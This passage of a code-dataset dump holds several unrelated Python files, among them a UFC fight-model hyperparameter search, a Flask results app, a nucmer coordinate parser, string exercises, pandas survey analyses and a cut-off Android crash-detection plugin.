cols\n \"pred_win_target_logit\",\n \"pred_fighter_finish_logit\",\n # acc elo cols\n 'pred_logit_p_SML_SMA_diff', \n 'pred_logit_p_TDL_TDA_diff',\n 'pred_logit_p_KD_SSL_diff', 'pred_logit_p_TDS_TDL_diff',\n ] + [\n # pca elo cols\n f\"pred_PC_{i}\" for i in range(n_pca)\n ]\n \n misc_cols = [\n \"espn_fight_id\",\n \"espn_fighter_id\",\n \"espn_opponent_id\",\n \"Date\",\n \"FighterResult\",\n \"win_target\",\n \"p_fighter_open_implied\",\n \"p_fighter_close_implied\",\n \"FighterOpen\", \n \"OpponentOpen\",\n ]\n\n feat_df = feat_df[misc_cols + feat_cols]\n result = self.eval_model(feat_df, feat_cols)\n result[\"pca_elo_alpha\"] = pca_elo_alpha\n result[\"binary_elo_alpha\"] = binary_elo_alpha\n result[\"acc_elo_alpha\"] = acc_elo_alpha\n result[\"n_pca\"] = n_pca\n return result\n\n def eval_model(self, feat_df, feat_cols):\n train_df = feat_df.dropna(subset=[\"win_target\"])\n print(train_df[feat_cols].isnull().mean())\n y_hat = self.model.fit_predict(train_df, train_df, feat_cols=feat_cols)\n \n xce = log_loss(y_true=train_df[\"win_target\"], y_pred=y_hat)\n\n k = len(feat_cols)\n log_likelihood = len(train_df) * xce * -1\n\n aikake = 2 * k - 2 * log_likelihood # xce is avg negative log likelihood\n return {\n \"in_sample_xce\": xce,\n \"n_params\": k,\n \"aikake\": aikake,\n }\n\n def get_pca_elo_df(self, elo_alpha, n_pca=16):\n pca_ew = PcaEloWrapper(n_pca=n_pca, target_cols=self.diff_cols, alpha=elo_alpha)\n pca_elo_feat_df = pca_ew.fit_transform_all(self.df)\n return pca_elo_feat_df\n\n def get_binary_elo_df(self, elo_alpha):\n elo_alphas = {col: elo_alpha for col in self.bin_cols}\n bin_ew = BinaryEloWrapper(elo_alphas)\n bin_elo_feat_df = bin_ew.fit_transform_all(self.df)\n return bin_elo_feat_df\n\n def get_acc_elo_df(self, elo_alpha):\n elo_alphas = {\n (landed_col, attempted_col): elo_alpha \n for landed_col, attempted_col in zip(self.landed_cols, self.attempted_cols)\n }\n acc_ew = AccEloWrapper(elo_alphas)\n acc_elo_feat_df = acc_ew.fit_transform_all(self.df)\n print(acc_elo_feat_df.isnull().mean())\n return acc_elo_feat_df\n\n def get_static_feat_df(self):\n # pca_elo_feat_df.shape, df.shape\n feat_df = self.df.dropna(subset=[\"p_fighter_open_implied\"]).copy()\n feat_df[\"log_height_diff\"] = (\n np.log(feat_df[\"HeightInches\"]) - np.log(feat_df[\"HeightInches_opp\"])\n ).fillna(0) # if missing from either fighter, impute with 0\n feat_df[\"log_reach_diff\"] = (\n np.log(feat_df[\"ReachInches\"]) - np.log(feat_df[\"ReachInches_opp\"])\n ).fillna(0) # if missing from either fighter, impute with 0\n feat_df[\"age_diff\"] = (feat_df[\"DOB\"] - feat_df[\"DOB_opp\"]).dt.days.fillna(0)\n feat_df[\"t_since_last_fight_log_diff\"] = (\n # if it's the first fight, impute with mean\n np.log(np.maximum(1, feat_df['t_since_prev_fight'].fillna(258))) - \n np.log(np.maximum(1, feat_df['t_since_prev_fight_opp'].fillna(258)))\n )\n\n feat_df[\"log_t_since_first_fight_diff\"] = (\n np.log(np.maximum(1, feat_df['t_since_first_fight'])) - \n np.log(np.maximum(1, feat_df['t_since_first_fight_opp']))\n )\n feat_df[\"sqrt_n_career_fights_diff\"] = (\n np.sqrt(feat_df[\"n_career_fights\"]) - np.sqrt(feat_df[\"n_career_fights_opp\"])\n )\n\n feat_df[\"min_weight_diff\"] = (\n np.log(feat_df[\"min_weight\"]) - np.log(feat_df[\"min_weight_opp\"])\n ).fillna(0)\n return feat_df\n\n def prep_dataset(self):\n df = pd.read_csv(\"data/full_bfo_ufc_espn_data_clean.csv\", parse_dates=[\"Date\", \"DOB\", \"DOB_opp\"])\n stat_landed_cols = [\n 'SCBL', 'SCHL', 'SCLL', 'SGBL', 'SGHL', 'SGLL', 'SDBL', 'SDHL', 'SDLL',\n 'SHL', 'SBL', 'SLL', 'SDL', 'SCL', 'SGL', 'SSL', 'TSL', 'TDL',\n ]\n stat_failed_cols = [\n 'SM_fail', 'SS_fail', 'TS_fail', 'TD_fail', 'SCB_fail', 'SCH_fail',\n 'SCL_fail', 'SGB_fail', 'SGH_fail', 'SGL_fail', 'SDB_fail', 'SDH_fail',\n 'SDL_fail', 'SH_fail', 'SB_fail', 'SL_fail', 'SD_fail', 'SC_fail',\n 'SG_fail',\n ]\n misc_stat_cols = [\n 'KD', 'RV', 'AD', 'ADTB', 'ADHG', 'ADTM', 'ADTS', 'ctrl_seconds', \n ]\n diff_cols = []\n for stat_col in stat_landed_cols + stat_failed_cols + misc_stat_cols:\n diff_col = f\"diff_sqrt_{stat_col}\"\n df[diff_col] = np.sqrt(df[stat_col]) - np.sqrt(df[stat_col+\"_opp\"])\n diff_cols.append(diff_col)\n self.diff_cols = diff_cols\n\n # defining some binary features\n df[\"win_target\"] = df[\"FighterResult\"].replace({\"W\":1, \"L\":0, \"D\":np.nan})\n\n fight_finish = df[\"decision_clean\"].isin([\"submission\", \"tko/ko\"]).replace({True:1, False:np.nan})\n df[\"fighter_finish\"] = fight_finish * df[\"win_target\"]\n self.bin_cols = [\"win_target\", \"fighter_finish\"]\n \n sm_finish = df[\"decision_clean\"] == \"submission\"\n sm_landed_fighter = (sm_finish & (df[\"FighterResult\"] == \"W\")).astype(int)\n df[\"SML\"] = sm_landed_fighter\n df[\"SMA\"] = np.maximum(df[\"SM\"], df[\"SML\"])\n\n sm_landed_opponent = (sm_finish & (df[\"FighterResult\"] == \"L\")).astype(int)\n df[\"SML_opp\"] = sm_landed_opponent\n df[\"SMA_opp\"] = np.maximum(df[\"SM_opp\"], df[\"SML_opp\"])\n self.landed_cols = [\"SML\", \"TDL\", \"KD\", \"TDS\"]\n self.attempted_cols = [\"SMA\", \"TDA\", \"SSL\", \"TDL\"]\n return df.query(\"Date <= '2021-01-01'\")\n\nif __name__ == \"__main__\":\n mod = SimpleSymmetricModel(feat_cols=None, target_col=\"win_target\", \n p_fighter_implied_col=\"p_fighter_open_implied\",\n beta_prior_std=1.0, mcmc=False)\n hp_tester = HyperParamTester(mod)\n result_df = hp_tester.test_hp_range(n_draws=5)\n print(result_df.sort_values(\"in_sample_xce\"))\n result_df.to_csv(\"data/hp_results_grid_narrower.csv\", index=False)\n","sub_path":"hp_search.py","file_name":"hp_search.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"645917675","text":"\"\"\"\nscript to rank output predictions across various trials\n\n\"\"\"\nimport collections\nimport getopt\nimport os\nimport sys\n\nuser = os.path.expanduser('~')\n\nworking_dir = os.getcwd()\nsys.path.append(working_dir)\n\ntry:\n from common_functions import output_in_text, average_ranking_and_rnn_score\nexcept ImportError:\n from .common_functions import output_in_text, average_ranking_and_rnn_score\n\nhome_dir = os.environ['HOME']\n\n\ndef ranking_wrt_reference(data, ref=''):\n \"\"\"\n ranking_wrt_reference module: read multiple input files and compare original data with the new trial data.\n \"\"\"\n \n rank_dic = collections.OrderedDict()\n ref_file_data = open(ref, 'r').readlines()\n \n for line in ref_file_data:\n line = line.rstrip('\\n')\n seq_i = line.split('\\t')\n rank_dic.update({seq_i[0]: []})\n \n for j in range(0, len(ref_file_data)):\n seq_o = ref_file_data[j].rstrip('\\n').split('\\t')\n rank_dic[seq_o[0]].append([j + 1, seq_o[1]])\n \n for fnc in data:\n if ref not in fnc:\n comp_file_data = open(fnc, 'r').readlines()\n \n for k in range(0, len(comp_file_data)):\n seq_m = comp_file_data[k].rstrip('\\n').split('\\t')\n rank_dic[seq_m[0]].append([k + 1, seq_m[1]])\n \n return rank_dic\n\n\n# following section calls functions defined above and do analysis ######\n\n\ndef show_help():\n print(\"\\n\\n\\t(-: PICKLE TO TXT CONVERSION and RANKING SCRIPT :-)\\n\\n\")\n print(\"Written by:RAVI KUMAR VERMA\\n\")\n print(\"\\nUSAGE:\")\n print(\"\\tpython3 rank_and_comparison.py -o outputfilename -i inputfile1 -i inputfile2 -i inputfile3\")\n print(\"\\n\\nOPTIONS:\")\n print(\"\\t-h or --help:\\tprint help\")\n print(\"\\t-o or --ofile:\\tOutput csv filename\")\n print(\"\\t-i or --ifile:\\tInput file names\")\n print(\"\\t\\t\\tIf using multiple input files provide each of their name using \\n\\t\\t\\tflag -i separately. see \"\n \"COMMAND LINE.\\n\")\n print(\"\\nDESCRIPTION:\")\n print(\"\\tScript read the outputs from the rnn.py script saved as pickle (.pkl) and convert them to txt file.\")\n print(\"\\tFile names are derived by replacing '.pkl' with '.txt'.\")\n print(\"\\tIf a single file name is given, the prediction sequences are shorted and printed to the text file based \"\n \"on their score.\")\n print(\"\\tIf more than one pickle file is given, the script will compare the sequence ranks in each of them and \"\n \"will provide an average ranks and scores.\\n\")\n\n\ndef main(argv):\n if argv:\n try:\n opts, argument = getopt.getopt(argv, \"ho:i::\", [\"ofile=\", \"ifile=\"])\n # print opts, argument\n except getopt.GetoptError:\n print('\\n', 'ERROR:', '\\n\\t', 'Check your arguments', '\\n')\n show_help()\n sys.exit(2)\n \n ipf = []\n ofn = ''\n for opt, arg in opts:\n if opt == '-h':\n show_help()\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n ipf.append(arg)\n elif opt in (\"-o\", \"--ofile\"):\n ofn = arg\n \n print('\\n', 'input files :', ipf)\n print('output file name:', ofn)\n \n return [ipf, ofn]\n\n\nif __name__ == \"__main__\":\n args = main(sys.argv[1:])\n pkl_files = args[0]\n out_filename = args[1]\n \n # convert .pkl files to human readable form\n # arr_prediction_txt_file_names = output_in_text(input_array=pkl_files, work_dir=working_dir)\n \n arr_prediction_txt_file_names = [x.replace('.pkl', '.txt') for x in pkl_files]\n ranking_out = ranking_wrt_reference(arr_prediction_txt_file_names, ref=arr_prediction_txt_file_names[0])\n average_ranking_and_rnn_score(ranking_out, o_filename=out_filename, txt_file_names=arr_prediction_txt_file_names)\n","sub_path":"rnn_modular_package/rank_and_comparison.py","file_name":"rank_and_comparison.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"83730213","text":"import sys\n\nlines = []\nfor line in sys.stdin:\n\tlines.append(line.rstrip('\\n'))\n\nres = [] \nfor i in lines[1:]:\n\tif (i.split(\" \")[1] in res):\n\t\tif (i.split(\" \")[0] not in res):\n\t\t\tres.insert(res.index(i.split(\" \")[1]), i.split(\" \")[0])\n\t\telse:\n\t\t\tres.append(i.split(\" \")[0])\n\telse:\n\t\tif (i.split(\" \")[0] not in res):\n\t\t\tres.append(i.split(\" \")[0])\n\t\tif (i.split(\" \")[1] not in res):\n\t\t\tres.append(i.split(\" \")[1])\n\nvalid = True\nfor i in res:\n\tif (res.count(i) > 1):\n\t\tvalid = False\nif valid:\n\tprint (\" < \".join([str(i) for i in res]))\nelse:\n\tprint (\"KO\")","sub_path":"MeilleurDevDeFranceOctobre2019Session1240/3-Cocktail/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"150772731","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\pyWebFramework\\core\\settings.py\n# Compiled at: 2019-11-01 23:14:39\n# Size of source mod 2**32: 424 bytes\n\n\nclass Settings:\n ROOT = ''\n TAX_INIT_SAMPLE_ROOT = ''\n TEMPLATE_FILE_ROOT = ''\n\n def load_settings(self, mod):\n for setting in dir(mod):\n if not setting.isupper():\n continue\n setting_value = getattr(mod, setting)\n if setting in dir(self):\n setattr(self, setting, setting_value)\n\n\nsettings = Settings()","sub_path":"pycfiles/PyWebFramework-1.1-py3.7/settings.cpython-37.py","file_name":"settings.cpython-37.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"94027195","text":"import pandas as pd\nimport sys\n\nentity_path = '../../source/Input/HI/Entity.csv'\nvotes_path = '../../source/Input/HI/Votes.csv'\nentity_columns = ['Entity Code Ar' , 'Entity Code En' , 'Entity Code']\n\ndf_entity = pd.DataFrame(pd.read_csv(entity_path , header = 0 ,names =list(entity_columns)))\ndf_entity.drop('Entity Code Ar' , axis =1 , inplace = True)\n\ndf_votes = pd.DataFrame(pd.read_csv(votes_path , header = 0 , names = ['Entity Code' , 'Sentiment' ,'Dates', 'Votes']))\ndf_votes = df_votes[df_votes['Entity Code'].notnull()]\n\ndf_new = pd.merge(df_votes , df_entity, on=['Entity Code'], how ='left')\ndf_all_votes = pd.DataFrame(df_new.groupby(['Entity Code'])['Votes'].sum())\n# Without group\n#df_all_votes = pd.DataFrame(df_new.groupby(['Entity Code'], as_index=False)['Votes'].sum())\n# Apply function can be used along with group without calcuated field\n\n\ndef getVotes (sentiment_type , df) :\n sentment = sentiment_type\n df_votes= pd.DataFrame(df)\n df_votes= df_votes[df_votes['Sentiment'].isin(list(sentment))]\n df_votes = pd.DataFrame(df_votes.groupby(['Entity Code'])['Votes'].sum())\n \n return pd.DataFrame(df_votes)\n \n \n\n\t\n\n#Merge all tables together and create single table\t\ndf_all_votes = df_all_votes.join(getVotes('H', df_new), how = 'outer', lsuffix='_All') \\\n\t\t\t\t\t\t .join(getVotes('U',df_new), how = 'outer', lsuffix='_H') \\\n\t\t\t\t\t\t .join(getVotes('N',df_new), how = 'outer', lsuffix='_U', rsuffix='_N')\ndf_all_votes.reset_index(inplace =True) \ndf_all_votes.fillna(0, inplace=True) # Fill Non entered value to 0 dropna() drop null\n\ndf_all_votes['HI %'] = round((((2 * df_all_votes['Votes_H']) + df_all_votes['Votes_N']) / (2 *df_all_votes['Votes_All']))*100,1)\ndf_all_votes['Happy %'] = round((df_all_votes['Votes_H'] / df_all_votes['Votes_All']) * 100,1)\ndf_all_votes['Unhappy %'] = round((df_all_votes['Votes_U'] / df_all_votes['Votes_All']) * 100,1)\ndf_all_votes['Neutral %'] = round((df_all_votes['Votes_N'] / df_all_votes['Votes_All']) * 100,1)\ndf_all_votes['Rank'] = df_all_votes['HI %'].rank(ascending=0)\n\n# Highe Medium and Low\n\n\nprint (df_all_votes)\n#Save file to csv\ndf_all_votes.to_csv('../../source/Output/VotesDetails_Join.csv', sept =',')","sub_path":"Code/Data Analysis/HI/HappinessMeter_Join.py","file_name":"HappinessMeter_Join.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"112877765","text":"from flask import render_template, request, redirect, url_for\nfrom flask_login import current_user\n\nfrom application import app, db, login_manager, login_required\nfrom application.tulokset.models import Tulos\nfrom application.kilpailut.models import Kilpailu\nfrom application.kilpailijat.models import Kilpailija\nfrom application.tulokset.forms import TulosForm\n\n# Toimitetaan halutun kilpailun infot luomislomaketta varten\n@app.route(\"/tulokset/new/<kilpailu_id>/\", methods=[\"GET\"])\n@login_required(role=\"admin\")\ndef tulokset_form(kilpailu_id):\n kilpailu = Kilpailu.query.get(kilpailu_id)\n return render_template(\"tulokset/new.html\", form = TulosForm(obj=kilpailu_id), kilpailu=kilpailu)\n\n# Haetaan kilpailun tulokset kilpailun id:n perusteella ja muodostetaan taulukko.html sisältö\n@app.route(\"/tulokset/<kilpailu_id>/\", methods=[\"GET\"])\ndef tulokset_show(kilpailu_id):\n return render_template(\"tulokset/taulukko.html\", kilpailun_Tulokset=Tulos.kilpailunTulokset(kilpailu_id), kilpailun_Tiedot=Tulos.kilpailunTiedot(kilpailu_id))\n\n# Haetaan yksittäisen tuloksen tiedot id:n perusteella ja annetaan muokattavaksi\n@app.route(\"/tulokset/edit/<tulokset_id>/\", methods=[\"GET\"])\ndef tulokset_show_edit(tulokset_id):\n tulosRivi = Tulos.query.get(tulokset_id)\n return render_template(\"tulokset/edit.html\", form=TulosForm(obj=tulosRivi), tulokset=tulosRivi )\n\n# Noudetaan luomistiedot lomakkeesta ja luodaan uusi Tulos-olio\n@app.route(\"/tulokset/new/<kilpailu_id>/\", methods=[\"POST\"])\n@login_required(role=\"admin\")\ndef tulokset_create(kilpailu_id):\n form = TulosForm(request.form)\n kilpailu = Kilpailu.query.get(kilpailu_id)\n\n if not form.validate():\n return render_template(\"tulokset/new.html\", form=form, kilpailu=kilpailu)\n\n kilpailuID = kilpailu_id\n kilpailijaID = request.form.get('kilpailija_id', type=int)\n tulos = Tulos(form.sijoitus.data, form.pisteet.data, kilpailuID, kilpailijaID)\n\n db.session().add(tulos)\n db.session().commit()\n\n return redirect(url_for(\"kilpailut_index\"))\n\n# Haetaan tiedot muokkauslomakkeesta ja lähetetään ne tietokantaan\n@app.route(\"/tulokset/edit/<tulokset_id>/\", methods=[\"POST\"])\n@login_required(role=\"admin\")\ndef tulokset_edit(tulokset_id):\n form = TulosForm(request.form)\n tulos = Tulos.query.get(tulokset_id)\n\n if not form.validate():\n return render_template(\"tulokset/edit.html\", form=form, tulokset=tulos)\n\n kilpailu_id = tulos.kilpailu_id\n\n tulos.pisteet = form.pisteet.data\n tulos.sijoitus = form.sijoitus.data\n tulos.kilpailija_id = request.form.get('kilpailija_id', type=int)\n\n db.session().commit()\n\n return redirect(url_for(\"tulokset_show\",kilpailu_id=kilpailu_id))\n\n# Poistetaan yksittäinen tulosrivi sen id:n avulla\n@app.route(\"/tulokset/delete/<tulokset_id>/\", methods=[\"POST\"])\n@login_required(role=\"admin\")\ndef tulokset_delete(tulokset_id):\n tulos = Tulos.query.get(tulokset_id)\n kilpailu_id = tulos.kilpailu_id\n db.session().delete(tulos)\n db.session().commit()\n\n return redirect(url_for(\"tulokset_show\", kilpailu_id=kilpailu_id))","sub_path":"application/tulokset/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"202709021","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/mallard/ducktype/extensions/csv.py\n# Compiled at: 2019-03-23 09:49:43\n# Size of source mod 2**32: 3062 bytes\nimport mallard.ducktype\n\nclass CsvExtension(mallard.ducktype.parser.ParserExtension):\n\n def __init__(self, parser, prefix, version):\n if version == 'experimental':\n self.version = version\n else:\n raise mallard.ducktype.parser.SyntaxError('Unsupported csv extension version: ' + version, parser)\n self.parser = parser\n self.prefix = prefix\n self.version = version\n self.table = None\n\n def take_block_node(self, node):\n if node.name != 'csv:table':\n return False\n self.table = mallard.ducktype.parser.Block('table')\n self.table.is_greedy = False\n self.parser.current.add_child(self.table)\n self.parser.current = self.table\n return True\n\n def parse_line_block(self, line):\n if self.table is None:\n return False\n if self.table is not self.parser.current:\n self.table = None\n return False\n tr = mallard.ducktype.parser.Block('tr')\n self.parser.current.add_child(tr)\n cells = line.split(',')\n for cell in cells:\n td = mallard.ducktype.parser.Block('td')\n tr.add_child(td)\n tdp = mallard.ducktype.parser.Block('p')\n td.add_child(tdp)\n tdp.add_text(cell)\n\n return True","sub_path":"pycfiles/mallard_ducktype-1.0.2-py3.7/csv.cpython-37.py","file_name":"csv.cpython-37.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"470116718","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on ...\r\n\r\n@author: damevski\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy\r\nimport os\r\nimport gensim\r\nfrom gensim.scripts.glove2word2vec import glove2word2vec\r\n\r\nclass Semantic_Feature:\r\n\r\n def __init__(self):\r\n script_dir = os.path.dirname(__file__)\r\n embedding_file = os.path.join(script_dir, 'embeddings/vectors.txt')\r\n w2v_embedding_file = os.path.join(script_dir, 'embeddings/w2v_vectors.txt')\r\n if not os.path.exists(w2v_embedding_file):\r\n glove2word2vec(embedding_file, w2v_embedding_file)\r\n self.model = gensim.models.KeyedVectors.load_word2vec_format(w2v_embedding_file)\r\n self.empty_vec_sim = 0.01\r\n \r\n def cosine_similarity(self, c1, c2):\r\n c1_words = [word for word in c1.text.split() if word in self.model.vocab]\r\n if not c1_words:\r\n return self.empty_vec_sim\r\n mean_vec_c1 = np.mean(self.model[c1_words], axis=0)\r\n c2_words = [word for word in c2.text.split() if word in self.model.vocab]\r\n if not c2_words:\r\n return self.empty_vec_sim\r\n mean_vec_c2 = np.mean(self.model[c2_words], axis=0)\r\n cosine = 1.0 - scipy.spatial.distance.cosine(mean_vec_c1, mean_vec_c2)\r\n return cosine\r\n\r\n def weighted_cosine_similarity(self, c1, c2):\r\n weighted_c1 = 0\r\n weighted_c2 = 0\r\n c1_words = [word for word in c1.text.split() if word in self.model.vocab]\r\n if not c1_words:\r\n return self.empty_vec_sim\r\n c2_words = [word for word in c2.text.split() if word in self.model.vocab]\r\n if not c2_words:\r\n return self.empty_vec_sim\r\n for c1_word in c1_words:\r\n weighted_c1 = np.add(weighted_c1, self.model[c1_word] * (0.001 / (0.001 + self.model.vocab[c1_word].count)))\r\n weighted_c1 = weighted_c1 / len(c1_words)\r\n for c2_word in c2_words:\r\n weighted_c2 = np.add(weighted_c2, self.model[c2_word] * (0.001 / (0.001 + self.model.vocab[c2_word].count)))\r\n weighted_c2 = weighted_c2 / len(c2_words)\r\n cosine = 1.0 - scipy.spatial.distance.cosine(weighted_c1, weighted_c2)\r\n return abs(cosine)\r\n","sub_path":"Comment-Summarization/annotation-engine/features/semantic_feature.py","file_name":"semantic_feature.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"639670705","text":"'''\nCreated on Jan 1, 2011\n\n@author: John L. Herndon\n@contact: herndon@cs.colostate.edu\n@organization: Colorado State University\n@group: Computer Science Department, Asa Ben-Hur's laboratory \n'''\n\nimport utils\nimport os\nimport re\n\ndef parseCoordMatchLine( match ):\n \n match = match.replace( '\\t', ' ' )\n sections = match.split( '|', 4 )\n \n #parse the first section, containing the start and end\n #locations of the match\n firstsection = sections[ 0 ].strip( )\n firstsectiontokens = re.split( ' +', firstsection )\n start = int( firstsectiontokens[ 0 ].strip( ) )\n end = int( firstsectiontokens[ 1 ].strip( ) )\n \n #parse the last section, containing the sequenceID\n lastsection = sections[ -1 ].strip( )\n lastsectiontokens = re.split( \" +\", lastsection )\n \n seqid = lastsectiontokens[ 0 ].strip( )\n \n return utils.Match( start, end, seqid )\n \ndef parseCoordMatchFile( coordFileName ):\n '''\n A method to parse the coord file.\n returns a list of utils.match objects\n '''\n returnValue = [ ]\n \n #throw if the file doesn't exist\n if os.path.exists( coordFileName ) == False:\n raise utils.NoFileFoundException( coordFileName )\n \n \n #read the nucmer file into memory\n lines = open( coordFileName ).readlines( )\n \n #skip forward to the start of the matches. \n i = 0\n while lines[ i ] [ 0] != '=':\n i += 1\n matchLines = lines[ i+1 : ]\n \n #parse each line for match start, end and sequenceID\n for matchLine in matchLines:\n returnValue.append( parseCoordMatchLine( matchLine ) )\n \n utils.logMessage( \"NucmerParser::parseCoordMatchFile( )\", \"Parse {0}, finding {1} matches\".format( coordFileName, len( returnValue ) ) )\n\n return returnValue\n \n \n \n \n \n \n ","sub_path":"galaxy/tools/uniqprimer/uniqprimer/uniqprimer-0.5.0/build/lib/primertools/nucmerparser.py","file_name":"nucmerparser.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"71668064","text":"\"\"\"\n# 1 Enter a string of words separated by spaces. Find the longest word.\n\n\"\"\"\n\ndef long_word(string):\n counter = 0\n list1 = string.split()\n l = len(list1)\n while l > 0:\n if counter < len(list1[l-1]):\n counter = len(list1[l-1])\n l -= 1\n else:\n l -= 1\n return counter\n\nprint(long_word('Find the longest word'))\n\n\n\n\"\"\"\n# 2 Enter an irregular string (that means it may have space at the beginning of a string, \nat the end of the string, and words may be separated by several spaces). \nMake the string regular (delete all spaces at the beginning and end of the string, leave one space separating words).\n\n\"\"\"\n\ndef irreg_str(string):\n l = string.split()\n return ' '.join(l)\n\n\n\nprint(irreg_str(' Find the longest word '))\n\n\n\"\"\"\nFrom Codewars # 1\nDefine String.prototype.toAlternatingCase \n(or a similar function/method such as to_alternating_case/toAlternatingCase\n/ToAlternatingCase in your selected language; \nsee the initial solution for details) such that each lowercase letter becomes uppercase \nand each uppercase letter becomes lowercase. For example:\n\nhEllO wOrld\n\"\"\"\n\ndef to_alternating_case(string):\n result = ''\n for i in string:\n if i.islower() == True:\n result += i.upper()\n else:\n result += i.lower()\n return result\n\nprint(to_alternating_case(\"1a2b3c4d5e\"))\n\n\n\n\"\"\"\nFrom Codewars # 2\n\nIs the string uppercase?\nTask\nCreate a method is_uppercase() to see whether the string is ALL CAPS. For example:\n\nis_uppercase(\"c\") == False\nis_uppercase(\"C\") == True\nis_uppercase(\"hello I AM DONALD\") == False\nis_uppercase(\"HELLO I AM DONALD\") == True\nis_uppercase(\"ACSKLDFJSgSKLDFJSKLDFJ\") == False\nis_uppercase(\"ACSKLDFJSGSKLDFJSKLDFJ\") == True\nIn this Kata, a string is said to be in ALL CAPS whenever it does not contain any lowercase letter \nso any string containing no letters at all is trivially considered to be in ALL CAPS.\n\n\n\n\"\"\"\n\ndef is_uppercase(inp):\n return inp.isupper()\n\nprint(is_uppercase('ACSKLDFJSgSKLDFJSKLDFJ'))\n\n\n\n\"\"\"\nFrom Codewars # 3\n\nGiven a string of digits, you should replace any digit below 5 with '0' \nand any digit 5 and above with '1'. Return the resulting string.\n\n\"\"\"\ndef fake_bin(x):\n res = ''\n l = list(x)\n for i in l:\n if int(i) < 5:\n res += '0'\n else:\n res += '1'\n return res\n\nprint(fake_bin(\"1234888\"))","sub_path":"Algorithm_4.py","file_name":"Algorithm_4.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"549405758","text":"import pandas as pd\r\nimport statistics\r\nimport matplotlib\r\nimport seaborn as sns\r\nfrom matplotlib import pyplot as plt\r\ndosya = pd.read_csv(\"sat.csv\")\r\n\r\n\r\n\r\nprint(dosya.info())\r\n\r\n\r\nprint((dosya['Mathematics Mean'].values)-(dosya['Critical Reading Mean'].values))\r\na = dosya['Critical Reading Mean'].mean()\r\nb = dosya['Mathematics Mean'].mean()\r\nc = dosya['Writing Mean'].mean()\r\nprint(a)\r\nprint(b)\r\nprint(c)\r\n\r\n\r\nsns.countplot(dosya['Mathematics Mean'],label=\"count of Mathematics\")\r\n\r\nplt.show()\r\nb = sns.countplot(dosya['Critical Reading Mean'],label=\"count of Reading\")\r\nplt.show()\r\nc = sns.countplot(dosya['Writing Mean'],label=\"count of Writing\")\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"\r\n# school name is 460 but number of test takers is 386.\r\n#1. answer is 460.\r\n#2.answer is 460-386=74.cause number of test takers is 386.Some lines are empty.\r\n#3.answer is \tBARD HIGH SCHOOL EARLY COLLEGE ,STUYVESANT HIGH SCHOOL e.g\r\n#4.answer is Lower East Side Preparatory High School.result is 218.Some result's output were nan.\r\nBecause lines are empty.\r\n\r\n\r\n\r\n\"\"\"","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"254957188","text":"\"\"\"\nTo install and enable, copy this file to $TOP/plugins/ where $TOP is the\ndirectory where runtests.py is located, then add this line to your settings\nfile:\n\nEXPERIMENTAL_CRASH_DETECT_SUPPORT=True\n\nThis plugin enables the use of the AppCrashDetector by runtests.py to\ndetect ANRs and force closes. runtests.py will start ACD before executing\na test and stop ACD after each test completes. If ANRs or force closes are\ndetected, additional logs (FCs.*.txt, ANRs.*.txt) will appear in the log\ndirectory for the test. This plugin assumes the AppCrashDetector code has\nalready been pushed to the device.\n\nYou may obtain a copy of AppCrashDetector from:\nhttp://mapps-test.sourceforge.mot-mobility.com/temp/AppCrashDetector.zip\n\nAppCrashDetector works on Eclair and later versions of Android.\n\"\"\"\n\nimport android\n\n# XXX: Report # ANRs, FCs in summary report\n@android.register_connect_hook\ndef __crashdetect_connect_hook(a, connecting):\n if not hasattr(a.settings, 'EXPERIMENTAL_CRASH_DETECT_SUPPORT'): return\n\n TAG = 'crashdetect'\n\n if connecting:\n android.log.info(TAG, 'Connecting')\n a.internal.crashdetect = a.internal.transport.popen('acd.sh')\n time.sleep(1) # allow it time to start up\n output = a.device.sh( 'AppCrashDetector.sh config -1 1;'\n 'AppCrashDetector.sh logConsole 1')\n if 'false' in output or 'not found' in output or 'Exception' in output:\n android.log.error(TAG, 'Startup error')\n a.device.sh('AppCrashDetector.sh shutdown')\n a.internal.crashdetect.communicate()\n del a.internal.crashdetect\n return\n\n # disconnecting\n if 'crashdetect' not in dir(a.internal):\n return\n\n android.log.info(TAG, 'Disconnecting')\n a.device.sh('AppCrashDetector.sh shutdown')\n output=a.internal.crashdetect.communicate()[0]\n IDLE,IN_ANR,IN_FC=range(3)\n state, ANRs, FCs = IDLE, [], []\n for o in output.splitlines():\n if state is not IDLE and len(o) is 0:\n state = IDLE\n elif state is 